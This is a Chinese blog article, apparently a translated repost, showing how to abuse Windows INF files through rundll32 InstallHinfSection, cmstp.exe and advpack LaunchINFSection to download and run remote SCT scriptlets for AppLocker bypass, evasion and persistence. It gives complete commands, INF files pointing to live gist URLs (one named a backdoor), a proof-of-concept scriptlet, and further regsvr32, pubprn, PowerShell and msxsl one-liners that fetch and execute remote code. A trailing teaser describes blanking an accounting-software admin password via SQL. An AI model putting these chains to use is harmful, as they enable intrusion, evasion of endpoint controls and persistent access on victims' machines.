如何利用INF Script下载执行技术来进行绕过、免杀和持久化

本篇文章为大家展示了如何利用INF Script下载执行技术来进行绕过、免杀和持久化，内容简明扼要并且容易理解，绝对能使你眼前一亮，通过这篇文章的详细介绍希望你能有所收获。通过对MSDN上一些处理不同COM脚本的调查和测试，结合网上的分享，我发现了一些有意思的东西，这些发现可能是远程调用执行脚本新方法。
其中最有意思的是LaunchINFSection。这篇文章主要讨论一下网上公开的利用INF Script的方法，并介绍下LaunchINFSection，最后再分享一些用法和作为防御者应该注意的事项。另外，还会给出一些其他远程执行脚本方法的参考。通过INF配置文件来执行脚本文件（.sct）的方法会涉及到InstallHinfSection(setipapi.dll)，CMSTP和LaunchINFSection(advpack.dll)。在DerbyCon 2017中KyleHanslovan和ChrisBisnett展示了一个非常有意思的东西，我已经将其翻译和整理过来（传送门：透过Autoruns看持久化绕过姿势的分享 ）。他们展示 了一种通过INF 远程调用执行sct脚本文件的方法：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 [path to file.inf]作者给出的INF文件如下：; ----------------------------------------------------------------------; Required Sections; -------------------------------免费云主机域名---------------------------------------[Version] Signature=$CHICAGO$Provider=testClass=Printer
[Manufacturer]HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
; ----------------------------------------------------------------------; Models Section; ----------------------------------------------------------------------[ModelsSection.NTx86]UnregisterDlls = Squiblydoo
[ModelsSection.NTia64]UnregisterDlls = Squiblydoo
[ModelsSection.NTamd64]UnregisterDlls = Squiblydoo
; ----------------------------------------------------------------------; Support Sections; ----------------------------------------------------------------------[DefaultInstall]UnregisterDlls = Squiblydoo
[Squiblydoo]11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct上面的命令会去调用默认INF块，即DefaultInstall，在这个块下，通过UnregisterDlls调用了Squiblydoo块下的恶意命令，通过scrobj.dll下载并执行指定的脚本文件。NickTyrer展示了一种用cmstp.exe加载INF文件来下载SCT脚本并执行COM脚本文件的方法。Oddvarmoe曾展示了用cmdtp.exe来绕过UAC和AppLocker默认策略。
基本用法如下：
cmstp.exe /s [file].infINF文件内容参考如下：;cmstp.exe /s cmstp.inf
[version]Signature=$chicago$AdvancedINF=2.5
[DefaultInstall_SingleUser]UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]%11%scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct
[Strings]AppAct = "SOFTWAREMicrosoftConnection Manager"ServiceName="Yay"ShortSvcName="Yay"通过如上的INF文件，cmstp.exe会调用文件中的DefaultInstall_SingleUser块。在这个块中，UnRegisterOCXs调用了UnRegisterOCXSection块来执行恶意操作，通过scrobj.dll来下载并执行指定的SCT脚本文件。根据MSDN的说明，LaunchINFSection是Advanced INF Package Installer（advpack.dll）的一个方法，用来调用INF文件中的某个块。从管理员的角度看，INF文件是一个用来安装设备驱动或Windows .cab文件的指令文件，包括注册Windows二进制（exe,dll,ocx），在注册表中增加键值，或设置一些关键参数的操作。
调用LaunchINFSection的方法如下：
rundll32.exe advpack.dll,LaunchINFSection [file].inf, [INF Section], [Path to Cab].cab, [Installation Flags]
如果不指定[INF Section]，LaunchINFSection将会调用默认的DefaultInstall块。另外，值得注意的是，advpack.dll还提供了LaunchINFSectionEX方法和与其它字符集兼容的LaunchINFSectionA，来完成LaunchINFSection同样的功能。作为PoC例子，我们使用如下的INF和SCT文件来测试：INF文件（保存为test.inf）：;cmstp.exe /s cmstp.inf
[version]Signature=$chicago$AdvancedINF=2.5
[DefaultInstall_SingleUser]UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]%11%scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
[Strings]AppAct = "SOFTWAREMicrosoftConnection Manager"ServiceName="Yay"ShortSvcName="Yay"SCT文件：XML version="1.0"?>scriptlet>
registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" >

script language="JScript"> CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> script>registration>
public> method name="Exec">method>public>script language="JScript">CDATA[
function Exec() { var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); }
]]>script>
scriptlet>使用下面的命令来执行一下：
rundll32.exe advpack.dll,LaunchINFSection test.inf,DefaultInstall_SingleUser,1,如果网络没有问题的话，会出现我们可爱的计算器：
这里，我们还可以用稍微不同的方法启动我们的程序，例如，把INF文件中的入口块改成DefaultInstall，那么我们就可以使用下面的命令执行程序，而无需指定一个块名字：rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
另外，我们也可以将卸载OCX的命令改成一个安装/注册的命令RegisterOCXs，并且随便一个名字来运行我们的程序：

CMSTP可用来绕过Autoruns（当开启隐藏Windows条目时），如下图：

当不启用隐藏过滤功能时，CMSTP做的自启动项如下：
注意：LaunchINFSection和InstallHinfSection不会以绕过新版本的Autoruns，因为这种启动方法依靠rundll32.exe调用相应的dll。当启用过滤时，Autoruns还是会显示这些自启动项。但是，LaunchINFSection提供了我们一种通过程序白名单绕过AppLocker规则来获得代码执行的技术。下图是通过scrobj.dll来下载一个SCT文件时产生的流量：

SCT文件只不过是text/XML文档，而INF文件只不过是text文档，其后缀扩展名可以不是.sct或.inf，但依然可以成功执行。（此处译者并没有实验成功，希望各位表哥赐教！）使用INF文件执行并不是唯一可以执行SCT脚本文件的方法，还有一些其它方法：RegSvr32/Scrobj.dllregsvr32 /s /n /u /i: http://url/file.sct scrobj.dllPubPrnpubprn.vbs 127.0.0.1 script:http ://url/file.sct[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script: http://url/file.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script: http://url/file.sct').Exec(0)值得注意的是，sct并不是唯一一种文件，还有其他的，如：MsXSLmsxsl.exe http://url/file.xml http://url/file.xsl$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://url/file.xsl',$s,$r);$x.Transform('http://url/file.xml','z');del z;上述内容就是如何利用INF Script下载执行技术来进行绕过、免杀和持久化，你们学到知识或技能了吗？如果还想学到更多技能或者丰富自己的知识储备，欢迎关注云编程开发博客行业资讯频道。

相关推荐: 破解KIS的管理员及账套管理员密码

前几天接手金碟KIS 软件，问遍了所有人，都不知道管理员及账套管理员密码，无奈只能进行破解select * from免费云主机域名 t_User进入账套数据库 ，修改密码为空update t_User set FSID = ” where FName = ‘…